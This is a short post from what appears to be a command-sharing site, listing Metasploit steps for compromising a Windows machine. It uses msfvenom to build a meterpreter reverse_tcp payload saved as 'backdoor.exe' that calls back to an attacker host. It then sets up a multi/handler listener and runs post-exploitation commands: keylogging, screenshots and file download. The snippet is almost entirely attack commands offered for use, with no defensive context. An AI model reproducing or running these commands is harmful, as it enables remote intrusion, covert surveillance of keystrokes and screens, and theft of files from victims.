GNU/Linux ◆ xterm ◆ bash 3733 views

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=4444 -f exe > backdoor.exe

msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST IP_KALI set LPORT 4444 show options exploit

meterpreter sysinfo ipconfig keyscan_start keyscan_dump screenshot download

………………………………………………….. Follow - https://twitter.com/XShellCTF